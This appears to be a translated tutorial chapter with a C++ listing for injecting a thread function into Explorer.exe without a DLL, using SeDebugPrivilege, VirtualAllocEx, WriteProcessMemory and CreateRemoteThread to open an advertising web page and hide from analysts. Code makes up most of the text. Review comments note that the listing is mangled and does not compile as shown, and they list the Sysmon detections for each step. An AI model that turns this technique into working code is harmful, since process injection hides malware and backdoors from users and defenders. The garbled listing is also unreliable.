Brief introduction
In the previous chapters I introduced remote thread injection and implemented a backdoor by injecting a .dll file into Explorer.exe, so that the bounce back door bypasses the firewall. But an .exe that always has to carry a .dll file along whenever it injects is really troublesome, so is there a way to perform the injection without using a .dll file at all?
The answer is yes: we can write the functionality directly inside the thread function and then inject the entire function. Compared with DLL injection this method is slightly more complex, and it is suited to injecting small programs. But pay attention to the address relocation problem of dynamically linked libraries: a normal process typically loads only Kernel32.dll by default and not other DLLs, and only Kernel32.dll and User32.dll can be relied on to have the same load address in the local and target processes, so it is best to call LoadLibrary and GetProcAddress manually inside the remote thread function to force the DLL file to be loaded again. It is recommended to turn off the compiler's "/GS" option in Visual Studio when compiling files for this kind of feature, and to refer to this link for other points to be aware of.
Below we use this method to make Windows Explorer (Explorer.exe) open a web page (advertisement), and an analyst inspecting the dynamically linked libraries the program depends on will not find a DLL file for our injected thread, which gives a certain hiding effect.
Code implementation
////////////////////////////////
// filename: injectprocess.cpp
// creator: peterzheng
// date: 2018/8/18 0:35
// Comment: Inject Process without Dll file
//
// NOTE(review): the listing is reproduced exactly as captured on the page.
// Identifier casing and several tokens are mangled ("# Include",
// "createtoolhelp32snapshot", "= =", "Invalid_handle_value", "1024x768",
// "th32proc EssID") and the file does not compile as shown; only comments
// were added. Read from the defender's side, the sequence below is the
// textbook CreateRemoteThread injection chain:
//   enable SeDebugPrivilege -> OpenProcess(PROCESS_ALL_ACCESS) on explorer.exe
//   -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread
// Every one of those steps is observable: Sysmon Event ID 10 (ProcessAccess
// with a full-access mask on explorer.exe), Event ID 8 (CreateRemoteThread
// whose start address is in a private, non-image RWX region), Security event
// 4703 (token privilege adjusted), and RWX private allocations in a shell
// process, which memory scanners treat as high-signal.
////////////////////////////////
#include <cstdio>
#include <cstdlib>
# Include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include < strsafe.h>
#include <tlhelp32.h>
#define MAX_LENGTH 50
#define normal_length 20
#pragma Warning (disable:4996)
Using namespace std;

// Parameter block copied into the target process. The remote thread gets a
// pointer to it as its only argument, so every string and address it needs
// travels inside this struct rather than through the injector's imports.
typedef struct _remoteparam{
    CHAR szoperation[normal_length];   // ShellExecute verb ("open")
    CHAR Szaddrerss[max_length];       // URL handed to ShellExecute
    CHAR Szlb[normal_length];          // DLL name to load inside the target ("Shell32.dll")
    CHAR Szfunc[normal_length];        // export name to resolve inside the target
    LPVOID dwmlaadress;                // LoadLibraryA address, taken from the injector's own Kernel32
    LPVOID dwmgpaaddress;              // GetProcAddress address, likewise
    LPVOID dwseaddress;                // resolved by the remote thread itself; written back into the block
} Remoteparam;

// Body of the remote thread. It is copied byte-for-byte into the target, so
// it must not touch the injector's import table, globals or string literals:
// all calls go through the function pointers carried in *lprp, and the
// ShellExecute address is resolved at run time with the LoadLibrary and
// GetProcAddress pointers. The prose above explains why this relocation
// detour is needed (Kernel32 is assumed to share a load address; Shell32 is
// not).
dword WINAPI ThreadProc (Remoteparam *lprp) {
    typedef hmodule (WINAPI *mloadlibrarya) (in LPCTSTR lpfilename);
    typedef FARPROC (WINAPI *mgetprocaddress) (in Hmodule hmodule, in LPCSTR lpprocname);
    typedef hinstance (WINAPI *mshellexecutea) (HWND hwnd, LPCSTR lpoperation, LPCSTR lPFile, LPCSTR lpparameters, LPCSTR lpdirectory, INT nshowcmd);
    Mloadlibrarya MLA;
    Mgetprocaddress Mgpa;
    Mshellexecutea MSE;
    MLA = (Mloadlibrarya) lprp->dwmlaadress;
    Mgpa = (mgetprocaddress) lprp->dwmgpaaddress;
    // Neither the LoadLibrary nor the GetProcAddress result is checked; if
    // either fails the call below goes through a null pointer and the host
    // process (explorer.exe) crashes -- one visible side effect of a botched
    // injection.
    Lprp->dwseaddress = (LPVOID) Mgpa (MLA (LPRP->SZLB), lprp->szfunc);
    MSE = (Mshellexecutea) lprp->dwseaddress;
    MSE (null, lprp->szoperation, LPRP->SZADDRERSS, NULL, NULL, SW_SHOWNORMAL);
    return 0;
}

// Returns the PID of the first process whose image name matches processname
// (compared after uppercasing both sides), or 0 when no match is found or the
// snapshot cannot be taken. Two things worth knowing: strupr uppercases its
// argument in place, so processname is modified on return, and the early
// return inside the loop leaks the snapshot handle.
DWORD GetProcessID (CHAR *processname) {
    PROCESSENTRY32 pe32;
    pe32.dwsize = sizeof (PE32);
    HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0);
    if (Hprocesssnap = = Invalid_handle_value) {
        printf ("CreateToolhelp32Snapshot error");
        return 0;
    }
    BOOL bprocess = Process32First (Hprocesssnap, &pe32);
    while (bprocess) {
        if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0)
            return Pe32.th32proc EssID;   // snapshot handle not closed on this path
        bprocess = Process32Next (Hprocesssnap, &pe32);
    }
    ClOsehandle (HPROCESSSNAP);
    return 0;
}

// Enables the named privilege (the caller passes se_debug_name) on the
// current process token. Returns 0 on success, 1 on any failure.
// Two caveats: the token handle is never closed, and a nonzero return from
// AdjustTokenPrivileges does not mean the privilege was granted -- the
// ERROR_NOT_ALL_ASSIGNED case (privilege not held, e.g. a non-elevated
// caller) is not checked, so the code carries on as if it had succeeded.
int Enabledebugpriv (const TCHAR *name) {
    HANDLE htoken;
    Token_privileges TP;
    LUID LUID;
    if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges | Token_query, &htoken) {
        printf ("OpenProcessToken error!\n");
        return 1;
    }
    if (! Lookupprivilegevalue (NULL, Name, &luid)) {
        printf ("Lookupprivilege error!\n");
        return 1;
    }
    TP. Privilegecount = 1;
    Tp. Privileges[0]. Attributes = se_privilege_enabled;
    Tp. Privileges[0]. Luid = Luid;
    if (! AdjustTokenPrivileges (htoken, 0, &TP, sizeof (token_privileges), NULL, NULL)) {
        printf ("AdjustTokenPrivileges Error!\n ");
        return 1;
    }
    return 0;
}

// Performs the injection into process dwpid. Returns TRUE once the remote
// thread has been created; it does not wait for the thread or check what it
// did. Resource handling is sloppy throughout: the process handle (named
// hWnd although it is a process handle) and the thread handle are never
// closed, and a failure after the first VirtualAllocEx leaves the remote
// allocations in place. Both remote regions are allocated Page_execute_readwrite,
// including the parameter block that only ever holds data; such RWX private
// regions inside explorer.exe are exactly what memory-scanning detections flag.
// The "1024x768 * 4"-byte copy of the thread function (as captured) is far
// larger than the function itself, so it copies whatever follows ThreadProc in
// the injector's image as well.
BOOL injectprocess (const DWORD dwpid) {
    if (Enabledebugpriv (se_debug_name)) return FALSE;
    HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwpid);   // full-access handle to the shell: Sysmon ProcessAccess (ID 10) territory
    if (!hwnd) return FALSE;
    Remoteparam RP;
    ZeroMemory (&RP, sizeof (Remoteparam));
    // Addresses are taken from the injector's own Kernel32 and assumed to be
    // valid in the target (same load address, see the prose above).
    Rp.dwmlaadress = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "LoadLibraryA");
    Rp.dwmgpaaddress = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "GetProcAddress");
    StringCchCopy (rp.szlb, sizeof (RP.SZLB), "Shell32.dll");
    StringCchCopy (Rp.szfunc, sizeof (Rp.szfunc), "Shellexecutea");
    StringCchCopy (Rp.szaddrerss, sizeof (RP.SZADDRERSS), "https://www.baidu.com");
    StringCchCopy (rp.szoperation, sizeof (rp.szoperation), "open");
    Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit | Mem_reserve, Page_execute_readwrite);
    if (!premoteparam) return FALSE;
    if (! WriteProcessMemory (HWnd, Premoteparam, &RP, sizeof (Remoteparam), 0)) return FALSE;
    LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit | Mem_reserve, Page_execute_readwrite);
    if (!premotethread) return FALSE;
    if (! WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE;
    // Thread start address lies in a private, non-image region of the target:
    // the classic Sysmon Event ID 8 / ETW threat-intelligence signature.
    HANDLE hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL);
    if (!hthread) return FALSE;
    return TRUE;
}

// Entry point: targets Explorer.exe by image name. The return value of
// Injectprocess is discarded, so failure is silent, and a PID of 0 from
// GetProcessID (process not found) is passed straight through to OpenProcess.
int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcmd) {
    CHAR Szprocname[max_length] = "n";
    StringCchCopy (Szprocname, Max_length, "Explorer.exe");
    Injectprocess (GetProcessID (szprocname));
    ExitProcess (0);
    return 0;
}
Secure Path-no DLL file for remote thread injection